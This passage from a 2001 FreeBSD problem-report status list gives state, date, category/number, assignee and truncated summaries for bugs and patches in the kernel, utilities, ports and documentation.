adduser.message before dirs are crea o [2001/01/30] ports/24743 chuckr a2ps port installs files in / o [2001/01/30] misc/24746 green SSH terminal hangs on large paste of data o [2001/01/30] ports/24749 dirk mysql323-server pkg-install script doesn' o [2001/01/31] bin/24757 ftpd not RFC compliant o [2001/02/01] docs/24786 doc missing FILES descriptions in sa(4) o [2001/02/02] docs/24797 phk when using MALLOC_DEFINE sys/param.h and o [2001/02/03] kern/24827 yokota Erratic Intellimouse Explorer in 4.1 and f [2001/02/04] gnu/24844 gdb does not support Linux threads a [2001/02/05] docs/24869 keramida Some text elf.5 is duplicated o [2001/02/05] kern/24882 ktrace not syncing .out file before panic o [2001/02/06] kern/24900 Server logs:indfcntl(8, F_SETFL, 4): Inap o [2001/02/06] kern/24902 IPC Message Queue number to big o [2001/02/06] misc/24907 qa Options screen at MenuMedia menu problem o [2001/02/07] ports/24940 demon prolem with Tnm::icmp echo command due to o [2001/02/08] bin/24953 green adduser ignores passwd_format in login.co o [2001/02/08] kern/24959 jesper proper TCP_NOPUSH/TCP_CORK compatibility o [2001/02/08] i386/24963 perfmon(4) doesn't work on SMP systems o [2001/02/09] ports/24983 portmgr Emacs ports have misleading names p [2001/02/11] bin/25012 tar(1) as root does not preserve ownershi o [2001/02/11] bin/25013 mv(1) cannot move unresolvable symlinks a o [2001/02/11] bin/25015 cp: options -i and -f do not work as docu p [2001/02/11] docs/25016 ru symlink(7) manpage says symlinks have no o [2001/02/11] bin/25017 cp -pRP does not preserve symlink ownersh o [2001/02/11] kern/25018 lstat(2) returns bogus permissions on sym o [2001/02/12] ports/25031 ache www/apache: dbmmanage fails verifying md5 o [2001/02/13] bin/25070 newsyslog(8) should send signals only onc o [2001/02/13] bin/25085 msmith mlxcontrol utility fails silently if devi o [2001/02/15] misc/25109 Fujitsu MO device MCC3064AP could't be c o [2001/02/19] misc/25218 peter mailwrapper invokes sendmail when resourc o [2001/02/20] bin/25241 luigi ipfw shouldn't show dynamics rules when s f [2001/02/21] bin/25263 green openssh and /etc/login.access does not wo o [2001/02/21] bin/25273 add fs type feature to vnconfig(8) to all f [2001/02/21] kern/25275 X server freezes system randomly on pentu f [2001/02/22] bin/25278 dd bs accepts -s -c but not -sc o [2001/02/22] alpha/25284 alpha PC164 won't reboot with graphics console o [2001/02/23] ports/25313 wosch Script source displayed at http://www.nl. o [2001/02/26] misc/25378 kris update contrib/libgmp to newer version (3 o [2001/02/26] kern/25386 cg Incorrect mixer registers (line & synth) o [2001/02/27] kern/25445 kernel statistics are displayed in wrong f [2001/02/28] gnu/25459 Dumpvalue.pm says SYNOPSYS instead of SYN o [2001/02/28] bin/25462 daemon(3) fails if called by a session le f [2001/02/28] i386/25463 PS/2 mouse sync problems with KVM switch o [2001/03/01] bin/25477 billf pam_radius fix to allow null passwords fo o [2001/03/02] ports/25490 wosch [PATCH] fix various bugs in stat(1) p [2001/03/02] misc/25499 buffer paste functionality from keyboard o [2001/03/04] kern/25521 Laptop with FreeBSD4.2 freezes in battery f [2001/03/04] conf/25527 jdp `man ldconfig' does not reflect its behav o [2001/03/04] ports/25531 portmgr INSTALL_* macros fail for non-root users o [2001/03/05] ports/25564 obrien Port ups-debug doesn't build on the alpha o [2001/03/06] bin/25572 sshd core dump o [2001/03/06] ports/25576 anholt XFree86-4 port installs manual pages with s [2001/03/07] bin/25587 des Add Solaris-like functionality to truss(1 o [2001/03/07] bin/25598 patch to let ftpd output message when cha s [2001/03/09] bin/25627 Cannot append hash after .elif in Makefil a [2001/03/11] ports/25708 dougb pine4 port hard-code /usr/local/include o [2001/03/11] bin/25723 green OpenSSH on 4.2 excessively regenerates RS o [2001/03/12] bin/25724 quota(1) outputs wrong limits about NFS q o [2001/03/12] kern/25733 mismatch between error reporting in smbus o [2001/03/12] bin/25736 ac -d option probrem with overdays logon o [2001/03/13] kern/25777 atime not updated on exec o [2001/03/13] ports/25779 portmgr (patch) make fetch-list should list all m o [2001/03/14] gnu/25794 markm [PATCH] make perl use a decent random num f [2001/03/14] ports/25815 portmgr [PATCH] Port build collision fix. o [2001/03/15] conf/25829 IPSec config in rc.network doesn't allow o [2001/03/16] kern/25866 more than 256 ptys, up to 1302 ptys. o [2001/03/18] kern/25909 4.x kernel freezes on P3-Asus CUSL2-C mot o [2001/03/18] kern/25910 cg Kernel sound driver may die if a program o [2001/03/19] misc/25917 green Paste thrue SSH Secure Shell v.2.4.0 (bui f [2001/03/19] kern/25923 vm_map.h defines a macro called "min_offs o [2001/03/21] misc/25984 bsd.prog.mk doesn't link C++ programs pro f [2001/03/22] docs/26003 rwatson getgroups(2) lists NGROUPS_MAX but not sy o [2001/03/22] bin/26005 MIME quoted-printable encoding added to v a [2001/03/22] docs/26006 jeff Changing zone(9) man page o [2001/03/22] kern/26016 VMWare is crash on SMP machine f [2001/03/23] misc/26035 System hangs when playing mp3 on PCI Maes o [2001/03/27] conf/26145 [PATCH] There is no make.conf equivalent o [2001/03/28] ports/26192 ports apel appeared both in xemacs/site-package o [2001/03/29] bin/26201 telnet SRA password exchange trap when no o [2001/04/01] kern/26277 ppc driver doesn't work with port 0x3BC p o [2001/04/02] docs/26286 chris *printf(3) etc should gain format string o [2001/04/02] ports/26303 adrian Wrong permission on Squid24's errors dire o [2001/04/03] kern/26316 Booting FreeBSD on VMware2 with 2 or 3 et o [2001/04/03] misc/26323 Quota system create zero-length files o [2001/04/03] kern/26324 dillon Defaults for NFS mounts over TCP are slow o [2001/04/04] kern/26348 [pcvt] scon -s, page fault in HP mode o [2001/04/04] bin/26359 [PATCH] a minor nit in how netstat detect o [2001/04/06] bin/26375 markm PAMized su allows non-wheel members to su o [2001/04/06] kern/26385 VMWare reboots entire system after starti o [2001/04/09] kern/26454 cg mixer volume settings on Maestro-2E (Diam o [2001/04/09] bin/26468 pkg_delete clears dependencies after runn o [2001/04/10] conf/26488 dougb incomplete named sandbox information a [2001/04/13] docs/26532 green ".Ql ?" becomes "`'?" through nroff (and a [2001/04/13] kern/26534 Add an option to ipfw to log gid/uid of w o [2001/04/13] kern/26547 "lnc" problem with shared memory mode wit o [2001/04/13] i386/26562 /dev/lpt0 returns EBUSY when attempting t o [2001/04/14] kern/26563 ioctl(SNDCTL_DSP_SPEED) returns -1 when f o [2001/04/14] kern/26584 kernel boot messages aren't logged correc f [2001/04/16] kern/26608 when boot Freebsd 4.2 Release from the c o [2001/04/16] kern/26618 unmount(2) can't unmount a filesystem who p [2001/04/17] misc/26646 srand() provides only 8-bit table o [2001/04/17] misc/26649 diskless client can't share root with ser o [2001/04/17] misc/26658 update to src/usr.bin/calendar/calendars/ o [2001/04/18] bin/26686 Freeze at boot from 4.3-RC4 floopies - US o [2001/04/18] misc/26695 CHANGE REQUEST: kill(all) -l output o [2001/04/20] kern/26740 rwatson [PATCH] jail improvement o [2001/04/22] kern/26787 dd sysctl change request o [2001/04/23] kern/26798 cvsup 4.3-RC -> 4.3-STABLE causes problem o [2001/04/23] ports/26801 ports cyrus port should add periodic file to pr s [2001/04/23] bin/26803 des Fix fetch to allow FTP puts in '-o' & all o [2001/04/24] i386/26812 peter old bootstrap /sys/i386/boot/... still in a [2001/04/25] bin/26854 sound Better fix for ESS Technology Maestro-2E o [2001/04/26] misc/26879 mkfilter not installed, yet referred to v s [2001/04/26] ports/26882 kde KDE should use ca-roots port for SSL cert o [2001/04/27] ports/26904 jim New port(?): net/everybuddy-i18n (i18n pa o [2001/04/28] bin/26919 qa sysinstall' fdisk can ONLY set bootable f o [2001/04/29] docs/26943 doc [patch] description of :C modifier is mis o [2001/04/30] i386/26994 obrien AMD Athlon Thunderbird not known to ident o [2001/05/01] kern/27008 kernel function sysbeep(xxx, 0) does prod o [2001/05/01] ports/27019 marcel patch supplied in PR ports/26976 breaks l o [2001/05/02] misc/27039 new syscons screensaver f [2001/05/02] misc/27041 modify src/release/Makefile to make anoth o [2001/05/04] ports/27075 sobomax Port java/javavmwrapper installs no man p o [2001/05/04] ports/27079 sobomax Improvements for javavmwrapper? o [2001/05/06] bin/27163 cracauer sh trap TSTP () deadly hangs o [2001/05/06] ports/27167 ports ETHOberonV4 won't run a [2001/05/07] ports/27182 mharo Teach portlint to recognize RUN_DEPENDS=$ f [2001/05/07] bin/27188 jon fix of rsh non-interactive mode behaviour o [2001/05/07] misc/27190 Day light savings in Mexico. o [2001/05/08] ports/27200 greid new port: bed (binary editor) o [2001/05/08] i386/27216 qa Can not get to shell prompt from serial c o [2001/05/09] kern/27232 On NFSv3 mounted filesystems, stat return o [2001/05/10] bin/27258 getty didn't check if if= isn't empty o [2001/05/11] bin/27268 fdisk does not recognize Linux extended p o [2001/05/11] kern/27269 Cannot mount linux extended (logical) par o [2001/05/11] bin/27270 cg sys/soundcard.h fails to define AFMT_S16_ o [2001/05/12] bin/27281 vidcontrol(1) does not have error codes f [2001/05/12] bin/27283 brian netstat -i missing IPv4 input packet coun o [2001/05/12] bin/27289 green SSH don't do correct diagnostic when no r o [2001/05/12] ports/27291 jim Bluefish port doesn't build mo files o [2001/05/13] i386/27306 mp hw watchpoints work unreliable under gdb o [2001/05/14] bin/27319 obrien df displays amd pid processes o [2001/05/17] kern/27403 lpt driver doesn't handle flags anymore o [2001/05/17] bin/27423 change request o [2001/05/18] kern/27429 'dependant' is a misspelling o [2001/05/18] bin/27433 ps binary does not do what the man page s o [2001/05/20] misc/27471 Linux emulation is missing code needed to o [2001/05/20] ports/27473 anholt when I install the package XFree86-4.0.3_ o [2001/05/20] bin/27483 qa make sysinstall ask for the keymap at ins f [2001/05/22] ports/27542 sobomax xmps should not require gnome o [2001/05/23] kern/27571 bp Changing policy of shadowing files and di o [2001/05/23] bin/27604 change truncate to support low case size o [2001/05/24] i386/27627 machdep.tsc_freq does not exists on machi o [2001/05/25] misc/27633 Mapping for serbian keyboards, follows IS o [2001/05/25] docs/27653 doc Updates to send-pr.html to support MIME o [2001/05/26] docs/27654 doc Update to PR 27653 o [2001/05/26] kern/27660 Kernel does not return error if adding du o [2001/05/27] bin/27687 fsck wrapper is not properly passing opti o [2001/05/27] bin/27697 assar trouble compiling libroken f [2001/05/31] gnu/27803 Enhancement to sort(1) o [2001/06/01] misc/27829 kris pax's uid/gid cache is read-only a [2001/06/02] docs/27833 cjc No man page for locate.rc o [2001/06/02] kern/27834 Cannot warm-reboot Compaq AP400 due to SC o [2001/06/02] kern/27835 execve() doesn't conform to execve(2) spe s [2001/06/02] docs/27843 alex [PATCH] make.conf WITH_* variables aren't o [2001/06/02] kern/27849 dfr AGP RELEASE ioctl frees memory o [2001/06/04] misc/27872 "Load Config" (sysinstall) hangs Compaq D o [2001/06/06] ports/27903 peter Update: www/transproxy o [2001/06/06] docs/27921 markm manpage skey(1) should be skey(7) o [2001/06/07] alpha/27930 NE2000 not supported on FreeBSD Alpha 4.x o [2001/06/07] ports/27931 ports devel/pth vs. native pthreads conflict fi o [2001/06/07] alpha/27933 alpha Time jitter under load on FreeBSD 4.3 alp a [2001/06/07] ports/27936 mi Update /usr/ports/deskutils/xmdiary 3.0.1 o [2001/06/08] bin/27972 losing information with talk o [2001/06/10] i386/28023 sendmail tries to get the netgraph.ko mod a [2001/06/11] conf/28078 qa /stand/sysinstall skips distro selection a [2001/06/11] conf/28081 murray /stand/sysinstall errs out if /cdrom/ alr o [2001/06/13] ports/28121 sobomax New port: 3D modelling and animation syst o [2001/06/13] ports/28138 tg python os.statvfs module is not functiona a [2001/06/15] bin/28171 des [PATCH] to support a HTTP_REFERER env var a [2001/06/15] gnu/28189 [PATCH] fix for detecting empty CVS commi o [2001/06/16] kern/28206 bp UMAPFS module should depend on NULLFS - p o [2001/06/17] misc/28236 [PATCH] iso-8859-1_to_cp437.scm doesn't c o [2001/06/17] kern/28247 arr ATM/HARP driver for IDT and ForeLE ATM ca o [2001/06/18] misc/28255 picobsd documentation still references ol s [2001/06/18] kern/28260 UIO_MAXIOV needs to be made public o [2001/06/20] bin/28294 dump of vinum based file systems by devic o [2001/06/20] kern/28297 change request for sys/i386/conf/NOTES o [2001/06/21] ports/28332 dwcjr Gimp manual port 1-2 years out of date, m o [2001/06/21] bin/28333 rtprio/idprio setuid problems s [2001/06/22] i386/28346 n_hibma USB ethernet dongle detach requires "ifco o [2001/06/23] bin/28364 lex(1) generated files fail to compile cl o [2001/06/23] ports/28365 wosch Typical use of portchecheckout breaks int o [2001/06/23] docs/28371 phk malloc(2) man page correction o [2001/06/26] bin/28435 [patch] allow newsyslog to signal process o [2001/06/27] bin/28449 cracauer sh(1) aborts on certain input p [2001/06/27] misc/28455 GNU readline should be updated to 4.2 o [2001/06/27] misc/28456 german keymap with dead keys o [2001/06/27] ports/28471 keith no iso8859 font o [2001/06/28] misc/28494 n_hibma ugen usable only from "attach" or by usbd o [2001/06/29] misc/28529 runetype.h doesn't have C++ 'extern "C"' o [2001/06/30] docs/28555 doc [PATCH] style(9) isn't explicit about boo o [2001/06/30] kern/28566 bp Mount_null loopbacks can hang startx temp o [2001/07/01] bin/28620 ru xinstall has no way to pass options to st o [2001/07/02] ports/28644 jmz Make error when rebuilding xdvi o [2001/07/03] ports/28678 wosch portcheckout doesn't allow flexible build o [2001/07/03] kern/28681 sos ATAPI MO drive support o [2001/07/03] ports/28682 portmgr Some port install builds fail if silent ( o [2001/07/04] docs/28699 doc strptime(3) %d format specifier not compl f [2001/07/05] ports/28717 kuriyama net/net-snmp stop enumerate interfaces wh o [2001/07/06] ports/28771 ports opendx server fails to start o [2001/07/07] bin/28789 /usr/bin/last does not filter for uucp co o [2001/07/07] ports/28803 cy ports/comms/conserver does not support ## o [2001/07/08] ports/28810 lioux qpopper 4.0.3 + PAM modification; HAVE_SH o [2001/07/10] ports/28887 brian [PATCH] sandbox for httptunnel! o [2001/07/10] kern/28888 Acer 8000 NIC not detected correctly o [2001/07/11] misc/28890 merge.c compares int i against size_t siz o [2001/07/13] misc/28938 small PicoBSD - An update to the build script t a [2001/07/13] docs/28949 phk the mknod(8) man page stills refers to bl o [2001/07/14] bin/28972 dwmalone gamma returns same result as lgamma o [2001/07/14] i386/28975 mjacob RocketPort problems o [2001/07/14] misc/28980 Fujitsu/Siemens Lifebook E-6540 stalls wh o [2001/07/15] bin/28988 We need more simple message digesting too f [2001/07/15] docs/28994 dd New article for docproj "Checkpoint VPN-1 o [2001/07/18] bin/29062 markm krb4 and krb5 multiply defined version sy o [2001/07/18] bin/29071 relay patch for rwhod o [2001/07/19] misc/29077 At loading notebook pccardd not correctly o [2001/07/19] misc/29089 Some kind of fsbn0 error... o [2001/07/20] misc/29103 make (1) dump core while processing ^C fr o [2001/07/21] bin/29119 menu of fdisk editor in 4.3R does not lis o [2001/07/22] ports/29154 nik TeX resource settings from MAKE_ENV in pr o [2001/07/23] bin/29164 maxim [PATCH] lack of 'Do not fragment' flag in o [2001/07/23] conf/29167 rc.pccard doesn't check /var/run/pccardd. o [2001/07/23] kern/29169 mjacob FC loop that 'goes away' never times out o [2001/07/24] ports/29199 sobomax jdk12beta port should register open-motif o [2001/07/25] ports/29223 portmgr cyrus-imapd and postfix master.8 manpage o [2001/07/25] kern/29233 VIA 82C686 AC97 codec gets probed as 'chi o [2001/07/26] docs/29245 doc top(1) manpage doesn't understand SMP o [2001/07/27] kern/29264 Recovery from LIPs on FCAL using isp not a [2001/07/28] misc/29292 sos The functional addtion to burncd(8) o [2001/07/29] ports/29298 cpiazza Installation of documentation for vcdgear o [2001/07/29] alpha/29299 alpha FreeBSD 4.3 Alpha + Tekram SCSI adapter p o [2001/07/29] kern/29307 NIC Initialization fails on dual CPU syst o [2001/07/29] misc/29312 sound Using mixer on pcm misbehaves with onboar f [2001/07/29] kern/29318 mjacob Exabyte 8200 needs SA_QUIRK_1FM and SA_QU o [2001/07/30] gnu/29331 still documented broken options in gcc ma o [2001/07/30] ports/29343 ports new postgresql7 port feature o [2001/07/31] kern/29355 mux [patch] lchflags support o [2001/08/01] bin/29361 startslip can't load if_sl.ko o [2001/08/01] bin/29363 [PATCH] newsyslog can support time as ext o [2001/08/02] ports/29392 portmgr Small built-time glitch in Makefile for a o [2001/08/02] kern/29395 reaction on ctrl-alt-del - poweroff, halt o [2001/08/03] kern/29423 [PATCH] kernel security hooks implementat o [2001/08/07] kern/29499 dwmalone it is not possible to send creditionals o [2001/08/07] bin/29516 markm telnet from an non FreeBSD host still use o [2001/08/07] ports/29519 ports X11 ports generate undef pthread refs wit o [2001/08/07] misc/29529 dcs Boot prompt "?" command doesn't list "boo f [2001/08/08] kern/29538 joerg Mounting /dev/fd0 never completes o [2001/08/08] misc/29550 duplicate pings jinside of vmware 2.0 o [2001/08/09] docs/29571 doc [PATCH] No man page for pgrp kernel funct o [2001/08/09] bin/29581 proposed gethostbyXXXX_r() implementation f [2001/08/09] ports/29590 ports [new port] www/parser-bin One more server o [2001/08/11] kern/29621 n_hibma Missing man page for ulpt a [2001/08/12] i386/29639 murray entry for zip 250 drives in /etc/disktab f [2001/08/13] ports/29691 portmgr New port variable USE_COMPAT_LIB - bsd.po o [2001/08/14] kern/29698 linux ipcs doesn'work o [2001/08/15] kern/29727 amr_enquiry3 structure in amrreg.h (amr d o [2001/08/15] ports/29732 sobomax linking error f [2001/08/16] kern/29777 n_hibma kernel uscanner.c contains wrong vendor a f [2001/08/17] docs/29807 dd [PATCH] XFREE86_VERSION is undocumented f [2001/08/18] bin/29850 markm ftpd.c doesn't check via PAM/pam_acct_mgm f [2001/08/18] ports/29856 portmgr make extract of cyrus did an install of c o [2001/08/19] conf/29870 rc.diskless2 uses /usr/sbin/mtree before o [2001/08/19] kern/29875 CURRENT driver for Tekram DC395X and DC31 o [2001/08/20] misc/29893 qa suggestions for 4.4 sysinstall o [2001/08/20] bin/29897 markm pam_unix patch, which uses loginclass pas o [2001/08/20] kern/29915 kernel panics on interaction with mlock a o [2001/08/21] ports/29929 ports wginstall.pl script chokes on calculated o [2001/08/22] bin/29961 ru A4 paper size for groff knob for /etc/mak o [2001/08/22] kern/29962 sent broadcast packets get spurious 4 byt a [2001/08/23] docs/30008 doc This document should be translated, comme o [2001/08/24] kern/30052 dc(4) driver queues outgoing pkts indefin o [2001/08/27] ports/30148 portmgr devel/libtool: shared libs with compaq-cc o [2001/08/28] kern/30160 Kernel panic when flash disk is removed a f [2001/08/28] ports/30166 ports ports/net/nettest2001 o [2001/08/28] kern/30179 FreeBSD 5.0 install hangs: deviceTry: mak o [2001/08/29] misc/30186 getaddrinfo does not handle incorrect ser o [2001/08/29] kern/30200 yokota Bug in psm in 4.4-RC o [2001/08/29] ports/30201 msmith editors/wordperfect in ports is not usabl o [2001/08/29] i386/30206 PS/2 server 85 can't boot kern.flp o [2001/08/29] misc/30213 Fatal Errors of Server Programe o [2001/08/30] misc/30224 No irq - PCI wi card doesn't allow interu o [2001/09/01] docs/30253 bp [PATCH] mount_unionfs(8) and mount_nullfs o [2001/09/01] kern/30257 apm enabled kernel panics (4.4-RC) o [2001/09/03] ports/30298 chuckr [PATCH] a2ps-4.13 can't cope with ENOMEM o [2001/09/03] conf/30301 Default printcap "mx" config too small o [2001/09/04] misc/30320 n_hibma USB mouse does not work after return'ing o [2001/09/04] bin/30321 strftime(3) '%s' format does not work pro o [2001/09/05] bin/30334 mount_nfs ignores acregmin, acregmax, axd o [2001/09/05] conf/30341 be keymap: wrong Capslock behaviour with o [2001/09/05] bin/30360 vmstat returns impossible data o [2001/09/06] bin/30392 sh: incorrect value of $? in here-documen o [2001/09/07] misc/30412 rtdl/dlopen() fails to merge common varia o [2001/09/07] kern/30422 WDT hardware watchdog driver & daemon o [2001/09/07] bin/30424 Generalization of vipw to lock pwdb while f [2001/09/08] conf/30441 Can't set interface arguments for dhcp co o [2001/09/08] docs/30442 doc remove broken referemce to gettime(9) fro o [2001/09/08] docs/30443 keramida remove broken reference to kerberos(1) fr o [2001/09/08] docs/30444 keramida remove broken references to gated(8) and o [2001/09/09] i386/30461 sound no audio cd with cmi8330 o [2001/09/09] bin/30464 pthread mutex attributes -- pshared f [2001/09/09] bin/30471 brian periodic script output to a file always a o [2001/09/10] bin/30484 rpc.rstatd consumed lots of open file des o [2001/09/10] ports/30499 portmgr libtool-1.4.1 port diffs o [2001/09/11] i386/30503 imp stray pccard card insertion events after o [2001/09/11] kern/30510 no apm for VIA KT133A chipset o [2001/09/11] misc/30517 using sysinstall with install.cfg has no o [2001/09/12] misc/30526 inserting a Sony Ninja-ATA pcmcia style c o [2001/09/12] kern/30541 imp [PATCH] old pccard beep depends on value o [2001/09/12] bin/30542 [PATCH] add -q option to shut up killall o [2001/09/13] docs/30556 doc vnconfig man page incorrect; functionalit o [2001/09/13] kern/30570 boot loader don't reacts on USB keyboard o [2001/09/14] ports/30573 nakai /usr/X11R6/bin/xfce_setup does not create o [2001/09/16] kern/30608 kern.ps_showallproc=0 doesn't limit queri o [2001/09/16] docs/30618 keramida ediff man page incomplete o [2001/09/17] kern/30634 kevent.data value incorrect for UDP socke o [2001/09/17] bin/30639 apmd crashes on SIGHUP (under certain con o [2001/09/17] bin/30640 apmd does not terminate properly on SIGTE f [2001/09/18] bin/30661 alfred FreeBSD-current fails to do partial NFS f o [2001/09/20] misc/30683 [PATCH] loader(8) fails to load module wh a [2001/09/20] bin/30685 cjc Patch for usr.bin/hexdump o [2001/09/20] i386/30700 sound Applications cannot synchronize sound usi o [2001/09/20] ports/30701 ports setiathome port misuses the 'nobody' user o [2001/09/21] ports/30707 ports midnight commander can't handle correctly o [2001/09/22] ports/30732 obrien bash2 - pkg-plist fix and sample files ad a [2001/09/22] bin/30737 murray sysinstall leaks file descriptors on rest o [2001/09/23] ports/30754 nakai x11/dgs port overwrites a number of files o [2001/09/23] ports/30777 portmgr add a 'make pkg-plist' make target in por o [2001/09/23] misc/30778 termcap problem with wyse-60 terminal o [2001/09/24] ports/30788 sobomax compile works, install fails of graphics/ o [2001/09/24] kern/30794 sound ESS Solo-1 does not work after suspend/re o [2001/09/25] bin/30812 giant termcap database update o [2001/09/25] bin/30819 /bin/mv results in warnings when /bin/cp o [2001/09/25] kern/30836 wpaul Chipset SiS735 / NIC SiS 900 o [2001/09/26] ports/30848 roam courier imapd won't compile with vpopmail o [2001/09/26] bin/30854 bootpd/bootpgw change - skip ARP modifica o [2001/09/26] misc/30857 intr_machdep.c allows access out of array f [2001/09/26] i386/30860 While install after "Mounting root from u o [2001/09/27] bin/30863 bootpd/dovend.c Win95 compatibility impro f [2001/09/27] ports/30870 ports httpd in free(): warning: recursive call o [2001/09/27] docs/30873 doc ``ip'' man page does not specify byte ord o [2001/09/29] bin/30907 green [PATCH] ssh configuration oddities o [2001/09/29] ports/30923 obrien small fix for devel/gindent port o [2001/09/30] ports/30929 brian [net/pppoa] use usbd to initialize USB AD o [2001/09/30] ports/30936 taoka pips-sc880 installed script contains inco o [2001/09/30] conf/30938 Improving behavior of /etc/periodic/daily o [2001/09/30] kern/30951 Optimize page queue scan on miss of speci o [2001/10/01] alpha/30970 alpha Ensoniq 1371 (Creative chipset) does not o [2001/10/02] ports/30983 portmgr [PATCH] Some staroffice cdrom fixes o [2001/10/03] ports/31013 obrien John The Ripper Package Lists Bad Path o [2001/10/04] bin/31034 regularly add original address logging fo o [2001/10/04] kern/31043 Missing Ptrace functionality in Linuxulat o [2001/10/04] kern/31048 linprocfs:/proc/meminfo cannot handle mul p [2001/10/04] bin/31052 fenner Traceroute needs update f [2001/10/05] ports/31061 ports New port: security/gnupg-devel o [2001/10/07] misc/31097 main thread will accept() failure when so o [2001/10/07] docs/31109 doc replace gif images w/ png ones due to pat o [2001/10/08] bin/31135 /bin/df reporting 'NaNB' as a Size. f [2001/10/09] ports/31159 cpiazza gmixer 0.98c dumps core with some mixers o [2001/10/09] docs/31164 doc man page for strftime is incorrect o [2001/10/10] bin/31199 tunefs error is incorrect when enabling s o [2001/10/10] conf/31200 Modification of rc.diskless1 needs change o [2001/10/10] bin/31201 [patch] add free_space(chunk) to libdisk o [2001/10/10] docs/31210 peter cvs info page missing -R f [2001/10/11] ports/31222 ports ports:astro/SETIsupport(version is wrong) o [2001/10/13] kern/31255 select with zero timeout returns 0 even w o [2001/10/14] docs/31264 jdp cvsup(1) "base" option and keyword descri a [2001/10/14] docs/31271 doc rl(4) discourages vender openness by disp f [2001/10/15] ports/31282 ports NEW PORT: aolserver+ad o [2001/10/15] misc/31297 yokota New screen blanker module for syscons o [2001/10/18] i386/31353 'shutdown -p' does not work on SMP Tyan T o [2001/10/19] kern/31367 General boot fault during mounting root w o [2001/10/19] ports/31369 adrian New KMerlin Port o [2001/10/19] misc/31380 NFS rootfs mount failure message too cryp o [2001/10/20] bin/31387 When getuid()=0, mailwrapper should drop o [2001/10/20] ports/31389 portmgr tidy readme templates + port readme enhan o [2001/10/21] i386/31427 minor incorrect code in sys/i386/i386/pma o [2001/10/22] bin/31432 umount(8) and unmount(2) don't corespond o [2001/10/22] kern/31445 sound cat sound.au > /dev/audio fails for sound a [2001/10/23] kern/31455 n_hibma [PATCH] ohci driver probrem when send dat o [2001/10/23] kern/31456 Register number definition for AMD PCnet o [2001/10/23] ports/31462 peter rdist6 does not like accounts with '.' in o [2001/10/25] ports/31486 kuriyama ports/palm/prc-tools-gcc does not build m f [2001/10/25] ports/31487 dinoex licq-qt-gui plugin does not parse local a o [2001/10/25] kern/31490 Panic in sysctl_sysctl_next_ls on empy no o [2001/10/26] kern/31521 cg pcm0 plays too fast on Intel 82801BA (ICH o [2001/10/27] i386/31535 Can't reboot system: Tyan Thunder K7+ Dua o [2001/10/28] conf/31555 rc.syscons does not run standalone o [2001/10/29] bin/31588 change request to allow mount(1) to set t o [2001/10/29] kern/31624 writev may return undocumented ECONNRESET o [2001/10/30] ports/31630 jmz Port se-ispell install the dictionary in a [2001/10/30] bin/31632 cjc ip6fw error under DNS dislabled environme o [2001/10/30] docs/31640 charnier Avoiding uppercase program names in manpa o [2001/10/30] kern/31647 socket calls can return undocumented EINV o [2001/10/30] docs/31653 jim Chapter 14 of the Handbook lacks content o [2001/10/31] ports/31669 ports New port: graphics/xawtv_applet o [2001/10/31] ports/31684 ports ports/comms/hylafax fixes o [2001/11/01] i386/31686 Problem with the timestamp option when fl o [2001/11/02] kern/31708 VM system / fsync / flushing delayed inde o [2001/11/02] kern/31711 Enhancements and bug fixes to Aironet dri o [2001/11/02] i386/31716 FreeBSD uses broken tsc timecounter by de f [2001/11/03] ports/31744 ports New port: emulators/minix (2.0.0) o [2001/11/05] gnu/31772 New option in dialog(1) f [2001/11/08] ports/31858 ports New port: pike 7.2.234 (current CVS versi o [2001/11/09] misc/31890 new syscons font o [2001/11/10] bin/31906 No method available to unwind atexit(3) s o [2001/11/11] ports/31910 greid comms/sms_client o [2001/11/12] ports/31926 lioux New port security/drweb-qmail: Qmail mess o [2001/11/12] bin/31933 dillon pw can interpret numeric name as userid d a [2001/11/12] ports/31943 dirk mysql323-server port hostname look up fai o [2001/11/12] ports/31944 portmgr bsd.port.mk: USE_XPM (implied by USE_MOTI o [2001/11/13] kern/31971 microuptime() went backwards when apm is o [2001/11/14] misc/31981 (mis)feature in getnetent parsing -- comm o [2001/11/14] bin/31985 New /etc/remote flag for tip to append LF o [2001/11/14] bin/31987 patch to allow dump(1) to notify operator s [2001/11/15] i386/32014 ppi locks up system during boot o [2001/11/15] ports/32015 kuriyama ports/palm/pilrc bugs o [2001/11/15] docs/32020 doc loader.8 manpage missing tunables o [2001/11/16] ports/32039 greid UPDATE devel/asmutils 0.14 -> 0.15 a [2001/11/16] docs/32041 doc Add point about net.inet.tcp.portange.{fi o [2001/11/16] docs/32054 doc inconsistency between index.3 and rindex. o [2001/11/17] conf/32067 Problems with spanish keyboard in console o [2001/11/18] bin/32092 crypt pickups the wrong password format o [2001/11/19] conf/32108 Proposed Firewall (IPv4) configuration sc o [2001/11/19] ports/32114 portmgr WRKDIRs should be moved to a central loca a [2001/11/19] misc/32120 PR misc/24324 errata o [2001/11/19] ports/32122 anholt xf86cfg graphics-mode fails on Samsung Sy o [2001/11/20] bin/32126 getopt(3) not Unix-98 conformant f [2001/11/20] misc/32144 murray unattended install with sysinstall doesn' o [2001/11/20] ports/32145 jmz XFree86 doesn't ldconfig itself o [2001/11/20] ports/32147 kris mindguard port dumps core o [2001/11/21] ports/32174 portmgr Autoconf patch for bsd.port.mk o [2001/11/22] ports/32202 kbyanc ports/devel/py-htmlkit distribution does o [2001/11/23] misc/32210 System hangs while kernel waiting for SCS o [2001/11/23] ports/32232 dirk Update and bugfix port: www/mod_php4 o [2001/11/23] ports/32243 sobomax ports/py-wxPython fails to compile o [2001/11/24] i386/32251 bugfix and new feature for apmd o [2001/11/24] ports/32258 scrappy converters/p5-Convert-ASN1 out of date o [2001/11/24] ports/32259 scrappy Update security/p5-IO-Socket-SSL request o [2001/11/26] conf/32288 After install: /etc/rc complains if crypt o [2001/11/26] bin/32299 peter nm coredumps on sendmail in -current o [2001/11/26] i386/32301 dfr Fix for agpgart for the AMD-751 and relat o [2001/11/26] ports/32317 petef Request for linux-qt port o [2001/11/26] bin/32318 cjc no userland tool available to test resolv f [2001/11/28] ports/32361 ports port doesn't work, www/mod_log_mysql o [2001/11/28] ports/32362 ports postgresql7 port should install more *.h a [2001/11/29] conf/32375 murray sysinstall doesn't respect User generated o [2001/11/30] misc/32400 rwhod - option to specify hostname o [2001/11/30] ports/32405 dirk Japanese encoding translation support for a [2001/11/30] bin/32411 shutdown's absolute-time handling could b o [2001/12/01] docs/32425 doc Document cvs update `P file' output o [2001/12/01] bin/32433 Cannot specify files beginning with + on o [2001/12/02] ports/32444 dirk www/mod_php4: ctype support o [2001/12/03] kern/32478 scsi/NIC drivers fail when using SMP kern o [2001/12/03] misc/32480 Missing graphic characters in syscons fon o [2001/12/04] bin/32501 quot(8) is stupid regarding 